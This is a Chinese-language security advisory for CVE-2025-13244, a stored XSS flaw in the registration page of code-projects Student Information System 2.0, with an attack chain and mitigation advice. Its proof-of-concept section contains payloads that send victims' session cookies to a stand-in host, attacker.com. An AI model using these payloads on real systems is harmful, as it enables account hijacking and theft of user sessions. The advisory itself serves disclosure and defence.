IPBUF安全漏洞报告
English
CVE-2025-13244 CVSS 4.3 中危

CVE-2025-13244: code-projects学生信息系统2.0 /register.php跨站脚本漏洞

披露日期: 2025-11-16
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-13244
漏洞类型
XSS跨站脚本攻击
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
code-projects Student Information System 2.0

相关标签

CVE-2025-13244XSS跨站脚本存储型XSSStudent Information Systemcode-projects/register.php中危漏洞

漏洞概述

CVE-2025-13244是code-projects Student Information System 2.0中的一个存储型跨站脚本(XSS)漏洞。该漏洞位于注册页面(/register.php)中,攻击者可以通过在用户注册表单中注入恶意JavaScript代码,当其他用户访问相关页面时,恶意脚本将被执行,从而窃取用户会话Cookie、劫持用户账户或进行钓鱼攻击。由于该漏洞需要用户交互(UI:R)才能触发,攻击者需要诱导受害者访问包含恶意脚本的页面。此漏洞已被公开披露,可能已被恶意利用。

技术细节

该漏洞是存储型XSS(Stored XSS)漏洞,存在于Student Information System 2.0的/register.php页面。攻击者可以在注册表单的用户名、邮箱或其他输入字段中插入恶意JavaScript代码,如:<script>alert(document.cookie)</script>。由于系统未对用户输入进行充分的输入验证和输出编码,恶意脚本被存储在数据库中。当管理员或其他用户查看用户列表或相关页面时,恶意脚本会在其浏览器上下文中执行。攻击者可利用此漏洞窃取会话令牌、修改页面内容或进行进一步的社会工程攻击。CVSS向量显示攻击复杂度低(AC:L),无需认证(PR:N),但需要用户交互(UI:R)。

攻击链分析

STEP 1
步骤1
攻击者访问目标网站的/register.php注册页面
STEP 2
步骤2
攻击者在注册表单中注入恶意XSS payload,如<script>alert(document.cookie)</script>
STEP 3
步骤3
系统未对输入进行过滤,将恶意脚本存储到数据库中
STEP 4
步骤4
管理员或普通用户访问显示用户信息的页面
STEP 5
步骤5
恶意脚本在受害者浏览器中执行,窃取Cookie或进行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2025-13244 PoC - Stored XSS in /register.php --> <!-- Payload: <script>alert(document.cookie)</script> --> <!-- Steps: --> <!-- 1. Navigate to /register.php --> <!-- 2. Enter payload in any input field --> <!-- 3. Submit the form --> <!-- 4. When admin views user list, XSS triggers --> <form action="http://target/register.php" method="POST"> <input type="text" name="username" value='"><script>fetch("https://attacker.com/steal?c="+document.cookie)</script><!="'> <input type="text" name="email" value="[email protected]"> <input type="text" name="password" value="password123"> <button type="submit">Register</button> </form> <!-- Alternative payload for session hijacking --> <script> var cookies = document.cookie; var img = new Image(); img.src = "https://attacker.com/log?cookie=" + encodeURIComponent(cookies); </script>

影响范围

code-projects Student Information System 2.0

防御指南

临时缓解措施
在官方修复方案发布前,可采取以下临时措施:1)在前端和后端同时对用户输入进行严格过滤和验证;2)对所有动态输出内容进行HTML实体编码;3)启用Content-Security-Policy限制脚本来源;4)对敏感Cookie设置HttpOnly属性;5)限制注册功能的访问频率;6)监控日志中的异常请求模式。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表